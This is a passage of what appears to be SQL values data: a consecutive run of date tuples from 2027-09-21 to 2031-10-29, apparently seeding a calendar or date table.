('2027-09-21'),
('2027-09-22'),
('2027-09-23'),
('2027-09-24'),
('2027-09-25'),
('2027-09-26'),
('2027-09-27'),
('2027-09-28'),
('2027-09-29'),
('2027-09-30'),
('2027-10-01'),
('2027-10-02'),
('2027-10-03'),
('2027-10-04'),
('2027-10-05'),
('2027-10-06'),
('2027-10-07'),
('2027-10-08'),
('2027-10-09'),
('2027-10-10'),
('2027-10-11'),
('2027-10-12'),
('2027-10-13'),
('2027-10-14'),
('2027-10-15'),
('2027-10-16'),
('2027-10-17'),
('2027-10-18'),
('2027-10-19'),
('2027-10-20'),
('2027-10-21'),
('2027-10-22'),
('2027-10-23'),
('2027-10-24'),
('2027-10-25'),
('2027-10-26'),
('2027-10-27'),
('2027-10-28'),
('2027-10-29'),
('2027-10-30'),
('2027-10-31'),
('2027-11-01'),
('2027-11-02'),
('2027-11-03'),
('2027-11-04'),
('2027-11-05'),
('2027-11-06'),
('2027-11-07'),
('2027-11-08'),
('2027-11-09'),
('2027-11-10'),
('2027-11-11'),
('2027-11-12'),
('2027-11-13'),
('2027-11-14'),
('2027-11-15'),
('2027-11-16'),
('2027-11-17'),
('2027-11-18'),
('2027-11-19'),
('2027-11-20'),
('2027-11-21'),
('2027-11-22'),
('2027-11-23'),
('2027-11-24'),
('2027-11-25'),
('2027-11-26'),
('2027-11-27'),
('2027-11-28'),
('2027-11-29'),
('2027-11-30'),
('2027-12-01'),
('2027-12-02'),
('2027-12-03'),
('2027-12-04'),
('2027-12-05'),
('2027-12-06'),
('2027-12-07'),
('2027-12-08'),
('2027-12-09'),
('2027-12-10'),
('2027-12-11'),
('2027-12-12'),
('2027-12-13'),
('2027-12-14'),
('2027-12-15'),
('2027-12-16'),
('2027-12-17'),
('2027-12-18'),
('2027-12-19'),
('2027-12-20'),
('2027-12-21'),
('2027-12-22'),
('2027-12-23'),
('2027-12-24'),
('2027-12-25'),
('2027-12-26'),
('2027-12-27'),
('2027-12-28'),
('2027-12-29'),
('2027-12-30'),
('2027-12-31'),
('2028-01-01'),
('2028-01-02'),
('2028-01-03'),
('2028-01-04'),
('2028-01-05'),
('2028-01-06'),
('2028-01-07'),
('2028-01-08'),
('2028-01-09'),
('2028-01-10'),
('2028-01-11'),
('2028-01-12'),
('2028-01-13'),
('2028-01-14'),
('2028-01-15'),
('2028-01-16'),
('2028-01-17'),
('2028-01-18'),
('2028-01-19'),
('2028-01-20'),
('2028-01-21'),
('2028-01-22'),
('2028-01-23'),
('2028-01-24'),
('2028-01-25'),
('2028-01-26'),
('2028-01-27'),
('2028-01-28'),
('2028-01-29'),
('2028-01-30'),
('2028-01-31'),
('2028-02-01'),
('2028-02-02'),
('2028-02-03'),
('2028-02-04'),
('2028-02-05'),
('2028-02-06'),
('2028-02-07'),
('2028-02-08'),
('2028-02-09'),
('2028-02-10'),
('2028-02-11'),
('2028-02-12'),
('2028-02-13'),
('2028-02-14'),
('2028-02-15'),
('2028-02-16'),
('2028-02-17'),
('2028-02-18'),
('2028-02-19'),
('2028-02-20'),
('2028-02-21'),
('2028-02-22'),
('2028-02-23'),
('2028-02-24'),
('2028-02-25'),
('2028-02-26'),
('2028-02-27'),
('2028-02-28'),
('2028-02-29'),
('2028-03-01'),
('2028-03-02'),
('2028-03-03'),
('2028-03-04'),
('2028-03-05'),
('2028-03-06'),
('2028-03-07'),
('2028-03-08'),
('2028-03-09'),
('2028-03-10'),
('2028-03-11'),
('2028-03-12'),
('2028-03-13'),
('2028-03-14'),
('2028-03-15'),
('2028-03-16'),
('2028-03-17'),
('2028-03-18'),
('2028-03-19'),
('2028-03-20'),
('2028-03-21'),
('2028-03-22'),
('2028-03-23'),
('2028-03-24'),
('2028-03-25'),
('2028-03-26'),
('2028-03-27'),
('2028-03-28'),
('2028-03-29'),
('2028-03-30'),
('2028-03-31'),
('2028-04-01'),
('2028-04-02'),
('2028-04-03'),
('2028-04-04'),
('2028-04-05'),
('2028-04-06'),
('2028-04-07'),
('2028-04-08'),
('2028-04-09'),
('2028-04-10'),
('2028-04-11'),
('2028-04-12'),
('2028-04-13'),
('2028-04-14'),
('2028-04-15'),
('2028-04-16'),
('2028-04-17'),
('2028-04-18'),
('2028-04-19'),
('2028-04-20'),
('2028-04-21'),
('2028-04-22'),
('2028-04-23'),
('2028-04-24'),
('2028-04-25'),
('2028-04-26'),
('2028-04-27'),
('2028-04-28'),
('2028-04-29'),
('2028-04-30'),
('2028-05-01'),
('2028-05-02'),
('2028-05-03'),
('2028-05-04'),
('2028-05-05'),
('2028-05-06'),
('2028-05-07'),
('2028-05-08'),
('2028-05-09'),
('2028-05-10'),
('2028-05-11'),
('2028-05-12'),
('2028-05-13'),
('2028-05-14'),
('2028-05-15'),
('2028-05-16'),
('2028-05-17'),
('2028-05-18'),
('2028-05-19'),
('2028-05-20'),
('2028-05-21'),
('2028-05-22'),
('2028-05-23'),
('2028-05-24'),
('2028-05-25'),
('2028-05-26'),
('2028-05-27'),
('2028-05-28'),
('2028-05-29'),
('2028-05-30'),
('2028-05-31'),
('2028-06-01'),
('2028-06-02'),
('2028-06-03'),
('2028-06-04'),
('2028-06-05'),
('2028-06-06'),
('2028-06-07'),
('2028-06-08'),
('2028-06-09'),
('2028-06-10'),
('2028-06-11'),
('2028-06-12'),
('2028-06-13'),
('2028-06-14'),
('2028-06-15'),
('2028-06-16'),
('2028-06-17'),
('2028-06-18'),
('2028-06-19'),
('2028-06-20'),
('2028-06-21'),
('2028-06-22'),
('2028-06-23'),
('2028-06-24'),
('2028-06-25'),
('2028-06-26'),
('2028-06-27'),
('2028-06-28'),
('2028-06-29'),
('2028-06-30'),
('2028-07-01'),
('2028-07-02'),
('2028-07-03'),
('2028-07-04'),
('2028-07-05'),
('2028-07-06'),
('2028-07-07'),
('2028-07-08'),
('2028-07-09'),
('2028-07-10'),
('2028-07-11'),
('2028-07-12'),
('2028-07-13'),
('2028-07-14'),
('2028-07-15'),
('2028-07-16'),
('2028-07-17'),
('2028-07-18'),
('2028-07-19'),
('2028-07-20'),
('2028-07-21'),
('2028-07-22'),
('2028-07-23'),
('2028-07-24'),
('2028-07-25'),
('2028-07-26'),
('2028-07-27'),
('2028-07-28'),
('2028-07-29'),
('2028-07-30'),
('2028-07-31'),
('2028-08-01'),
('2028-08-02'),
('2028-08-03'),
('2028-08-04'),
('2028-08-05'),
('2028-08-06'),
('2028-08-07'),
('2028-08-08'),
('2028-08-09'),
('2028-08-10'),
('2028-08-11'),
('2028-08-12'),
('2028-08-13'),
('2028-08-14'),
('2028-08-15'),
('2028-08-16'),
('2028-08-17'),
('2028-08-18'),
('2028-08-19'),
('2028-08-20'),
('2028-08-21'),
('2028-08-22'),
('2028-08-23'),
('2028-08-24'),
('2028-08-25'),
('2028-08-26'),
('2028-08-27'),
('2028-08-28'),
('2028-08-29'),
('2028-08-30'),
('2028-08-31'),
('2028-09-01'),
('2028-09-02'),
('2028-09-03'),
('2028-09-04'),
('2028-09-05'),
('2028-09-06'),
('2028-09-07'),
('2028-09-08'),
('2028-09-09'),
('2028-09-10'),
('2028-09-11'),
('2028-09-12'),
('2028-09-13'),
('2028-09-14'),
('2028-09-15'),
('2028-09-16'),
('2028-09-17'),
('2028-09-18'),
('2028-09-19'),
('2028-09-20'),
('2028-09-21'),
('2028-09-22'),
('2028-09-23'),
('2028-09-24'),
('2028-09-25'),
('2028-09-26'),
('2028-09-27'),
('2028-09-28'),
('2028-09-29'),
('2028-09-30'),
('2028-10-01'),
('2028-10-02'),
('2028-10-03'),
('2028-10-04'),
('2028-10-05'),
('2028-10-06'),
('2028-10-07'),
('2028-10-08'),
('2028-10-09'),
('2028-10-10'),
('2028-10-11'),
('2028-10-12'),
('2028-10-13'),
('2028-10-14'),
('2028-10-15'),
('2028-10-16'),
('2028-10-17'),
('2028-10-18'),
('2028-10-19'),
('2028-10-20'),
('2028-10-21'),
('2028-10-22'),
('2028-10-23'),
('2028-10-24'),
('2028-10-25'),
('2028-10-26'),
('2028-10-27'),
('2028-10-28'),
('2028-10-29'),
('2028-10-30'),
('2028-10-31'),
('2028-11-01'),
('2028-11-02'),
('2028-11-03'),
('2028-11-04'),
('2028-11-05'),
('2028-11-06'),
('2028-11-07'),
('2028-11-08'),
('2028-11-09'),
('2028-11-10'),
('2028-11-11'),
('2028-11-12'),
('2028-11-13'),
('2028-11-14'),
('2028-11-15'),
('2028-11-16'),
('2028-11-17'),
('2028-11-18'),
('2028-11-19'),
('2028-11-20'),
('2028-11-21'),
('2028-11-22'),
('2028-11-23'),
('2028-11-24'),
('2028-11-25'),
('2028-11-26'),
('2028-11-27'),
('2028-11-28'),
('2028-11-29'),
('2028-11-30'),
('2028-12-01'),
('2028-12-02'),
('2028-12-03'),
('2028-12-04'),
('2028-12-05'),
('2028-12-06'),
('2028-12-07'),
('2028-12-08'),
('2028-12-09'),
('2028-12-10'),
('2028-12-11'),
('2028-12-12'),
('2028-12-13'),
('2028-12-14'),
('2028-12-15'),
('2028-12-16'),
('2028-12-17'),
('2028-12-18'),
('2028-12-19'),
('2028-12-20'),
('2028-12-21'),
('2028-12-22'),
('2028-12-23'),
('2028-12-24'),
('2028-12-25'),
('2028-12-26'),
('2028-12-27'),
('2028-12-28'),
('2028-12-29'),
('2028-12-30'),
('2028-12-31'),
('2029-01-01'),
('2029-01-02'),
('2029-01-03'),
('2029-01-04'),
('2029-01-05'),
('2029-01-06'),
('2029-01-07'),
('2029-01-08'),
('2029-01-09'),
('2029-01-10'),
('2029-01-11'),
('2029-01-12'),
('2029-01-13'),
('2029-01-14'),
('2029-01-15'),
('2029-01-16'),
('2029-01-17'),
('2029-01-18'),
('2029-01-19'),
('2029-01-20'),
('2029-01-21'),
('2029-01-22'),
('2029-01-23'),
('2029-01-24'),
('2029-01-25'),
('2029-01-26'),
('2029-01-27'),
('2029-01-28'),
('2029-01-29'),
('2029-01-30'),
('2029-01-31'),
('2029-02-01'),
('2029-02-02'),
('2029-02-03'),
('2029-02-04'),
('2029-02-05'),
('2029-02-06'),
('2029-02-07'),
('2029-02-08'),
('2029-02-09'),
('2029-02-10'),
('2029-02-11'),
('2029-02-12'),
('2029-02-13'),
('2029-02-14'),
('2029-02-15'),
('2029-02-16'),
('2029-02-17'),
('2029-02-18'),
('2029-02-19'),
('2029-02-20'),
('2029-02-21'),
('2029-02-22'),
('2029-02-23'),
('2029-02-24'),
('2029-02-25'),
('2029-02-26'),
('2029-02-27'),
('2029-02-28'),
('2029-03-01'),
('2029-03-02'),
('2029-03-03'),
('2029-03-04'),
('2029-03-05'),
('2029-03-06'),
('2029-03-07'),
('2029-03-08'),
('2029-03-09'),
('2029-03-10'),
('2029-03-11'),
('2029-03-12'),
('2029-03-13'),
('2029-03-14'),
('2029-03-15'),
('2029-03-16'),
('2029-03-17'),
('2029-03-18'),
('2029-03-19'),
('2029-03-20'),
('2029-03-21'),
('2029-03-22'),
('2029-03-23'),
('2029-03-24'),
('2029-03-25'),
('2029-03-26'),
('2029-03-27'),
('2029-03-28'),
('2029-03-29'),
('2029-03-30'),
('2029-03-31'),
('2029-04-01'),
('2029-04-02'),
('2029-04-03'),
('2029-04-04'),
('2029-04-05'),
('2029-04-06'),
('2029-04-07'),
('2029-04-08'),
('2029-04-09'),
('2029-04-10'),
('2029-04-11'),
('2029-04-12'),
('2029-04-13'),
('2029-04-14'),
('2029-04-15'),
('2029-04-16'),
('2029-04-17'),
('2029-04-18'),
('2029-04-19'),
('2029-04-20'),
('2029-04-21'),
('2029-04-22'),
('2029-04-23'),
('2029-04-24'),
('2029-04-25'),
('2029-04-26'),
('2029-04-27'),
('2029-04-28'),
('2029-04-29'),
('2029-04-30'),
('2029-05-01'),
('2029-05-02'),
('2029-05-03'),
('2029-05-04'),
('2029-05-05'),
('2029-05-06'),
('2029-05-07'),
('2029-05-08'),
('2029-05-09'),
('2029-05-10'),
('2029-05-11'),
('2029-05-12'),
('2029-05-13'),
('2029-05-14'),
('2029-05-15'),
('2029-05-16'),
('2029-05-17'),
('2029-05-18'),
('2029-05-19'),
('2029-05-20'),
('2029-05-21'),
('2029-05-22'),
('2029-05-23'),
('2029-05-24'),
('2029-05-25'),
('2029-05-26'),
('2029-05-27'),
('2029-05-28'),
('2029-05-29'),
('2029-05-30'),
('2029-05-31'),
('2029-06-01'),
('2029-06-02'),
('2029-06-03'),
('2029-06-04'),
('2029-06-05'),
('2029-06-06'),
('2029-06-07'),
('2029-06-08'),
('2029-06-09'),
('2029-06-10'),
('2029-06-11'),
('2029-06-12'),
('2029-06-13'),
('2029-06-14'),
('2029-06-15'),
('2029-06-16'),
('2029-06-17'),
('2029-06-18'),
('2029-06-19'),
('2029-06-20'),
('2029-06-21'),
('2029-06-22'),
('2029-06-23'),
('2029-06-24'),
('2029-06-25'),
('2029-06-26'),
('2029-06-27'),
('2029-06-28'),
('2029-06-29'),
('2029-06-30'),
('2029-07-01'),
('2029-07-02'),
('2029-07-03'),
('2029-07-04'),
('2029-07-05'),
('2029-07-06'),
('2029-07-07'),
('2029-07-08'),
('2029-07-09'),
('2029-07-10'),
('2029-07-11'),
('2029-07-12'),
('2029-07-13'),
('2029-07-14'),
('2029-07-15'),
('2029-07-16'),
('2029-07-17'),
('2029-07-18'),
('2029-07-19'),
('2029-07-20'),
('2029-07-21'),
('2029-07-22'),
('2029-07-23'),
('2029-07-24'),
('2029-07-25'),
('2029-07-26'),
('2029-07-27'),
('2029-07-28'),
('2029-07-29'),
('2029-07-30'),
('2029-07-31'),
('2029-08-01'),
('2029-08-02'),
('2029-08-03'),
('2029-08-04'),
('2029-08-05'),
('2029-08-06'),
('2029-08-07'),
('2029-08-08'),
('2029-08-09'),
('2029-08-10'),
('2029-08-11'),
('2029-08-12'),
('2029-08-13'),
('2029-08-14'),
('2029-08-15'),
('2029-08-16'),
('2029-08-17'),
('2029-08-18'),
('2029-08-19'),
('2029-08-20'),
('2029-08-21'),
('2029-08-22'),
('2029-08-23'),
('2029-08-24'),
('2029-08-25'),
('2029-08-26'),
('2029-08-27'),
('2029-08-28'),
('2029-08-29'),
('2029-08-30'),
('2029-08-31'),
('2029-09-01'),
('2029-09-02'),
('2029-09-03'),
('2029-09-04'),
('2029-09-05'),
('2029-09-06'),
('2029-09-07'),
('2029-09-08'),
('2029-09-09'),
('2029-09-10'),
('2029-09-11'),
('2029-09-12'),
('2029-09-13'),
('2029-09-14'),
('2029-09-15'),
('2029-09-16'),
('2029-09-17'),
('2029-09-18'),
('2029-09-19'),
('2029-09-20'),
('2029-09-21'),
('2029-09-22'),
('2029-09-23'),
('2029-09-24'),
('2029-09-25'),
('2029-09-26'),
('2029-09-27'),
('2029-09-28'),
('2029-09-29'),
('2029-09-30'),
('2029-10-01'),
('2029-10-02'),
('2029-10-03'),
('2029-10-04'),
('2029-10-05'),
('2029-10-06'),
('2029-10-07'),
('2029-10-08'),
('2029-10-09'),
('2029-10-10'),
('2029-10-11'),
('2029-10-12'),
('2029-10-13'),
('2029-10-14'),
('2029-10-15'),
('2029-10-16'),
('2029-10-17'),
('2029-10-18'),
('2029-10-19'),
('2029-10-20'),
('2029-10-21'),
('2029-10-22'),
('2029-10-23'),
('2029-10-24'),
('2029-10-25'),
('2029-10-26'),
('2029-10-27'),
('2029-10-28'),
('2029-10-29'),
('2029-10-30'),
('2029-10-31'),
('2029-11-01'),
('2029-11-02'),
('2029-11-03'),
('2029-11-04'),
('2029-11-05'),
('2029-11-06'),
('2029-11-07'),
('2029-11-08'),
('2029-11-09'),
('2029-11-10'),
('2029-11-11'),
('2029-11-12'),
('2029-11-13'),
('2029-11-14'),
('2029-11-15'),
('2029-11-16'),
('2029-11-17'),
('2029-11-18'),
('2029-11-19'),
('2029-11-20'),
('2029-11-21'),
('2029-11-22'),
('2029-11-23'),
('2029-11-24'),
('2029-11-25'),
('2029-11-26'),
('2029-11-27'),
('2029-11-28'),
('2029-11-29'),
('2029-11-30'),
('2029-12-01'),
('2029-12-02'),
('2029-12-03'),
('2029-12-04'),
('2029-12-05'),
('2029-12-06'),
('2029-12-07'),
('2029-12-08'),
('2029-12-09'),
('2029-12-10'),
('2029-12-11'),
('2029-12-12'),
('2029-12-13'),
('2029-12-14'),
('2029-12-15'),
('2029-12-16'),
('2029-12-17'),
('2029-12-18'),
('2029-12-19'),
('2029-12-20'),
('2029-12-21'),
('2029-12-22'),
('2029-12-23'),
('2029-12-24'),
('2029-12-25'),
('2029-12-26'),
('2029-12-27'),
('2029-12-28'),
('2029-12-29'),
('2029-12-30'),
('2029-12-31'),
('2030-01-01'),
('2030-01-02'),
('2030-01-03'),
('2030-01-04'),
('2030-01-05'),
('2030-01-06'),
('2030-01-07'),
('2030-01-08'),
('2030-01-09'),
('2030-01-10'),
('2030-01-11'),
('2030-01-12'),
('2030-01-13'),
('2030-01-14'),
('2030-01-15'),
('2030-01-16'),
('2030-01-17'),
('2030-01-18'),
('2030-01-19'),
('2030-01-20'),
('2030-01-21'),
('2030-01-22'),
('2030-01-23'),
('2030-01-24'),
('2030-01-25'),
('2030-01-26'),
('2030-01-27'),
('2030-01-28'),
('2030-01-29'),
('2030-01-30'),
('2030-01-31'),
('2030-02-01'),
('2030-02-02'),
('2030-02-03'),
('2030-02-04'),
('2030-02-05'),
('2030-02-06'),
('2030-02-07'),
('2030-02-08'),
('2030-02-09'),
('2030-02-10'),
('2030-02-11'),
('2030-02-12'),
('2030-02-13'),
('2030-02-14'),
('2030-02-15'),
('2030-02-16'),
('2030-02-17'),
('2030-02-18'),
('2030-02-19'),
('2030-02-20'),
('2030-02-21'),
('2030-02-22'),
('2030-02-23'),
('2030-02-24'),
('2030-02-25'),
('2030-02-26'),
('2030-02-27'),
('2030-02-28'),
('2030-03-01'),
('2030-03-02'),
('2030-03-03'),
('2030-03-04'),
('2030-03-05'),
('2030-03-06'),
('2030-03-07'),
('2030-03-08'),
('2030-03-09'),
('2030-03-10'),
('2030-03-11'),
('2030-03-12'),
('2030-03-13'),
('2030-03-14'),
('2030-03-15'),
('2030-03-16'),
('2030-03-17'),
('2030-03-18'),
('2030-03-19'),
('2030-03-20'),
('2030-03-21'),
('2030-03-22'),
('2030-03-23'),
('2030-03-24'),
('2030-03-25'),
('2030-03-26'),
('2030-03-27'),
('2030-03-28'),
('2030-03-29'),
('2030-03-30'),
('2030-03-31'),
('2030-04-01'),
('2030-04-02'),
('2030-04-03'),
('2030-04-04'),
('2030-04-05'),
('2030-04-06'),
('2030-04-07'),
('2030-04-08'),
('2030-04-09'),
('2030-04-10'),
('2030-04-11'),
('2030-04-12'),
('2030-04-13'),
('2030-04-14'),
('2030-04-15'),
('2030-04-16'),
('2030-04-17'),
('2030-04-18'),
('2030-04-19'),
('2030-04-20'),
('2030-04-21'),
('2030-04-22'),
('2030-04-23'),
('2030-04-24'),
('2030-04-25'),
('2030-04-26'),
('2030-04-27'),
('2030-04-28'),
('2030-04-29'),
('2030-04-30'),
('2030-05-01'),
('2030-05-02'),
('2030-05-03'),
('2030-05-04'),
('2030-05-05'),
('2030-05-06'),
('2030-05-07'),
('2030-05-08'),
('2030-05-09'),
('2030-05-10'),
('2030-05-11'),
('2030-05-12'),
('2030-05-13'),
('2030-05-14'),
('2030-05-15'),
('2030-05-16'),
('2030-05-17'),
('2030-05-18'),
('2030-05-19'),
('2030-05-20'),
('2030-05-21'),
('2030-05-22'),
('2030-05-23'),
('2030-05-24'),
('2030-05-25'),
('2030-05-26'),
('2030-05-27'),
('2030-05-28'),
('2030-05-29'),
('2030-05-30'),
('2030-05-31'),
('2030-06-01'),
('2030-06-02'),
('2030-06-03'),
('2030-06-04'),
('2030-06-05'),
('2030-06-06'),
('2030-06-07'),
('2030-06-08'),
('2030-06-09'),
('2030-06-10'),
('2030-06-11'),
('2030-06-12'),
('2030-06-13'),
('2030-06-14'),
('2030-06-15'),
('2030-06-16'),
('2030-06-17'),
('2030-06-18'),
('2030-06-19'),
('2030-06-20'),
('2030-06-21'),
('2030-06-22'),
('2030-06-23'),
('2030-06-24'),
('2030-06-25'),
('2030-06-26'),
('2030-06-27'),
('2030-06-28'),
('2030-06-29'),
('2030-06-30'),
('2030-07-01'),
('2030-07-02'),
('2030-07-03'),
('2030-07-04'),
('2030-07-05'),
('2030-07-06'),
('2030-07-07'),
('2030-07-08'),
('2030-07-09'),
('2030-07-10'),
('2030-07-11'),
('2030-07-12'),
('2030-07-13'),
('2030-07-14'),
('2030-07-15'),
('2030-07-16'),
('2030-07-17'),
('2030-07-18'),
('2030-07-19'),
('2030-07-20'),
('2030-07-21'),
('2030-07-22'),
('2030-07-23'),
('2030-07-24'),
('2030-07-25'),
('2030-07-26'),
('2030-07-27'),
('2030-07-28'),
('2030-07-29'),
('2030-07-30'),
('2030-07-31'),
('2030-08-01'),
('2030-08-02'),
('2030-08-03'),
('2030-08-04'),
('2030-08-05'),
('2030-08-06'),
('2030-08-07'),
('2030-08-08'),
('2030-08-09'),
('2030-08-10'),
('2030-08-11'),
('2030-08-12'),
('2030-08-13'),
('2030-08-14'),
('2030-08-15'),
('2030-08-16'),
('2030-08-17'),
('2030-08-18'),
('2030-08-19'),
('2030-08-20'),
('2030-08-21'),
('2030-08-22'),
('2030-08-23'),
('2030-08-24'),
('2030-08-25'),
('2030-08-26'),
('2030-08-27'),
('2030-08-28'),
('2030-08-29'),
('2030-08-30'),
('2030-08-31'),
('2030-09-01'),
('2030-09-02'),
('2030-09-03'),
('2030-09-04'),
('2030-09-05'),
('2030-09-06'),
('2030-09-07'),
('2030-09-08'),
('2030-09-09'),
('2030-09-10'),
('2030-09-11'),
('2030-09-12'),
('2030-09-13'),
('2030-09-14'),
('2030-09-15'),
('2030-09-16'),
('2030-09-17'),
('2030-09-18'),
('2030-09-19'),
('2030-09-20'),
('2030-09-21'),
('2030-09-22'),
('2030-09-23'),
('2030-09-24'),
('2030-09-25'),
('2030-09-26'),
('2030-09-27'),
('2030-09-28'),
('2030-09-29'),
('2030-09-30'),
('2030-10-01'),
('2030-10-02'),
('2030-10-03'),
('2030-10-04'),
('2030-10-05'),
('2030-10-06'),
('2030-10-07'),
('2030-10-08'),
('2030-10-09'),
('2030-10-10'),
('2030-10-11'),
('2030-10-12'),
('2030-10-13'),
('2030-10-14'),
('2030-10-15'),
('2030-10-16'),
('2030-10-17'),
('2030-10-18'),
('2030-10-19'),
('2030-10-20'),
('2030-10-21'),
('2030-10-22'),
('2030-10-23'),
('2030-10-24'),
('2030-10-25'),
('2030-10-26'),
('2030-10-27'),
('2030-10-28'),
('2030-10-29'),
('2030-10-30'),
('2030-10-31'),
('2030-11-01'),
('2030-11-02'),
('2030-11-03'),
('2030-11-04'),
('2030-11-05'),
('2030-11-06'),
('2030-11-07'),
('2030-11-08'),
('2030-11-09'),
('2030-11-10'),
('2030-11-11'),
('2030-11-12'),
('2030-11-13'),
('2030-11-14'),
('2030-11-15'),
('2030-11-16'),
('2030-11-17'),
('2030-11-18'),
('2030-11-19'),
('2030-11-20'),
('2030-11-21'),
('2030-11-22'),
('2030-11-23'),
('2030-11-24'),
('2030-11-25'),
('2030-11-26'),
('2030-11-27'),
('2030-11-28'),
('2030-11-29'),
('2030-11-30'),
('2030-12-01'),
('2030-12-02'),
('2030-12-03'),
('2030-12-04'),
('2030-12-05'),
('2030-12-06'),
('2030-12-07'),
('2030-12-08'),
('2030-12-09'),
('2030-12-10'),
('2030-12-11'),
('2030-12-12'),
('2030-12-13'),
('2030-12-14'),
('2030-12-15'),
('2030-12-16'),
('2030-12-17'),
('2030-12-18'),
('2030-12-19'),
('2030-12-20'),
('2030-12-21'),
('2030-12-22'),
('2030-12-23'),
('2030-12-24'),
('2030-12-25'),
('2030-12-26'),
('2030-12-27'),
('2030-12-28'),
('2030-12-29'),
('2030-12-30'),
('2030-12-31'),
('2031-01-01'),
('2031-01-02'),
('2031-01-03'),
('2031-01-04'),
('2031-01-05'),
('2031-01-06'),
('2031-01-07'),
('2031-01-08'),
('2031-01-09'),
('2031-01-10'),
('2031-01-11'),
('2031-01-12'),
('2031-01-13'),
('2031-01-14'),
('2031-01-15'),
('2031-01-16'),
('2031-01-17'),
('2031-01-18'),
('2031-01-19'),
('2031-01-20'),
('2031-01-21'),
('2031-01-22'),
('2031-01-23'),
('2031-01-24'),
('2031-01-25'),
('2031-01-26'),
('2031-01-27'),
('2031-01-28'),
('2031-01-29'),
('2031-01-30'),
('2031-01-31'),
('2031-02-01'),
('2031-02-02'),
('2031-02-03'),
('2031-02-04'),
('2031-02-05'),
('2031-02-06'),
('2031-02-07'),
('2031-02-08'),
('2031-02-09'),
('2031-02-10'),
('2031-02-11'),
('2031-02-12'),
('2031-02-13'),
('2031-02-14'),
('2031-02-15'),
('2031-02-16'),
('2031-02-17'),
('2031-02-18'),
('2031-02-19'),
('2031-02-20'),
('2031-02-21'),
('2031-02-22'),
('2031-02-23'),
('2031-02-24'),
('2031-02-25'),
('2031-02-26'),
('2031-02-27'),
('2031-02-28'),
('2031-03-01'),
('2031-03-02'),
('2031-03-03'),
('2031-03-04'),
('2031-03-05'),
('2031-03-06'),
('2031-03-07'),
('2031-03-08'),
('2031-03-09'),
('2031-03-10'),
('2031-03-11'),
('2031-03-12'),
('2031-03-13'),
('2031-03-14'),
('2031-03-15'),
('2031-03-16'),
('2031-03-17'),
('2031-03-18'),
('2031-03-19'),
('2031-03-20'),
('2031-03-21'),
('2031-03-22'),
('2031-03-23'),
('2031-03-24'),
('2031-03-25'),
('2031-03-26'),
('2031-03-27'),
('2031-03-28'),
('2031-03-29'),
('2031-03-30'),
('2031-03-31'),
('2031-04-01'),
('2031-04-02'),
('2031-04-03'),
('2031-04-04'),
('2031-04-05'),
('2031-04-06'),
('2031-04-07'),
('2031-04-08'),
('2031-04-09'),
('2031-04-10'),
('2031-04-11'),
('2031-04-12'),
('2031-04-13'),
('2031-04-14'),
('2031-04-15'),
('2031-04-16'),
('2031-04-17'),
('2031-04-18'),
('2031-04-19'),
('2031-04-20'),
('2031-04-21'),
('2031-04-22'),
('2031-04-23'),
('2031-04-24'),
('2031-04-25'),
('2031-04-26'),
('2031-04-27'),
('2031-04-28'),
('2031-04-29'),
('2031-04-30'),
('2031-05-01'),
('2031-05-02'),
('2031-05-03'),
('2031-05-04'),
('2031-05-05'),
('2031-05-06'),
('2031-05-07'),
('2031-05-08'),
('2031-05-09'),
('2031-05-10'),
('2031-05-11'),
('2031-05-12'),
('2031-05-13'),
('2031-05-14'),
('2031-05-15'),
('2031-05-16'),
('2031-05-17'),
('2031-05-18'),
('2031-05-19'),
('2031-05-20'),
('2031-05-21'),
('2031-05-22'),
('2031-05-23'),
('2031-05-24'),
('2031-05-25'),
('2031-05-26'),
('2031-05-27'),
('2031-05-28'),
('2031-05-29'),
('2031-05-30'),
('2031-05-31'),
('2031-06-01'),
('2031-06-02'),
('2031-06-03'),
('2031-06-04'),
('2031-06-05'),
('2031-06-06'),
('2031-06-07'),
('2031-06-08'),
('2031-06-09'),
('2031-06-10'),
('2031-06-11'),
('2031-06-12'),
('2031-06-13'),
('2031-06-14'),
('2031-06-15'),
('2031-06-16'),
('2031-06-17'),
('2031-06-18'),
('2031-06-19'),
('2031-06-20'),
('2031-06-21'),
('2031-06-22'),
('2031-06-23'),
('2031-06-24'),
('2031-06-25'),
('2031-06-26'),
('2031-06-27'),
('2031-06-28'),
('2031-06-29'),
('2031-06-30'),
('2031-07-01'),
('2031-07-02'),
('2031-07-03'),
('2031-07-04'),
('2031-07-05'),
('2031-07-06'),
('2031-07-07'),
('2031-07-08'),
('2031-07-09'),
('2031-07-10'),
('2031-07-11'),
('2031-07-12'),
('2031-07-13'),
('2031-07-14'),
('2031-07-15'),
('2031-07-16'),
('2031-07-17'),
('2031-07-18'),
('2031-07-19'),
('2031-07-20'),
('2031-07-21'),
('2031-07-22'),
('2031-07-23'),
('2031-07-24'),
('2031-07-25'),
('2031-07-26'),
('2031-07-27'),
('2031-07-28'),
('2031-07-29'),
('2031-07-30'),
('2031-07-31'),
('2031-08-01'),
('2031-08-02'),
('2031-08-03'),
('2031-08-04'),
('2031-08-05'),
('2031-08-06'),
('2031-08-07'),
('2031-08-08'),
('2031-08-09'),
('2031-08-10'),
('2031-08-11'),
('2031-08-12'),
('2031-08-13'),
('2031-08-14'),
('2031-08-15'),
('2031-08-16'),
('2031-08-17'),
('2031-08-18'),
('2031-08-19'),
('2031-08-20'),
('2031-08-21'),
('2031-08-22'),
('2031-08-23'),
('2031-08-24'),
('2031-08-25'),
('2031-08-26'),
('2031-08-27'),
('2031-08-28'),
('2031-08-29'),
('2031-08-30'),
('2031-08-31'),
('2031-09-01'),
('2031-09-02'),
('2031-09-03'),
('2031-09-04'),
('2031-09-05'),
('2031-09-06'),
('2031-09-07'),
('2031-09-08'),
('2031-09-09'),
('2031-09-10'),
('2031-09-11'),
('2031-09-12'),
('2031-09-13'),
('2031-09-14'),
('2031-09-15'),
('2031-09-16'),
('2031-09-17'),
('2031-09-18'),
('2031-09-19'),
('2031-09-20'),
('2031-09-21'),
('2031-09-22'),
('2031-09-23'),
('2031-09-24'),
('2031-09-25'),
('2031-09-26'),
('2031-09-27'),
('2031-09-28'),
('2031-09-29'),
('2031-09-30'),
('2031-10-01'),
('2031-10-02'),
('2031-10-03'),
('2031-10-04'),
('2031-10-05'),
('2031-10-06'),
('2031-10-07'),
('2031-10-08'),
('2031-10-09'),
('2031-10-10'),
('2031-10-11'),
('2031-10-12'),
('2031-10-13'),
('2031-10-14'),
('2031-10-15'),
('2031-10-16'),
('2031-10-17'),
('2031-10-18'),
('2031-10-19'),
('2031-10-20'),
('2031-10-21'),
('2031-10-22'),
('2031-10-23'),
('2031-10-24'),
('2031-10-25'),
('2031-10-26'),
('2031-10-27'),
('2031-10-28'),
('2031-10-29'),
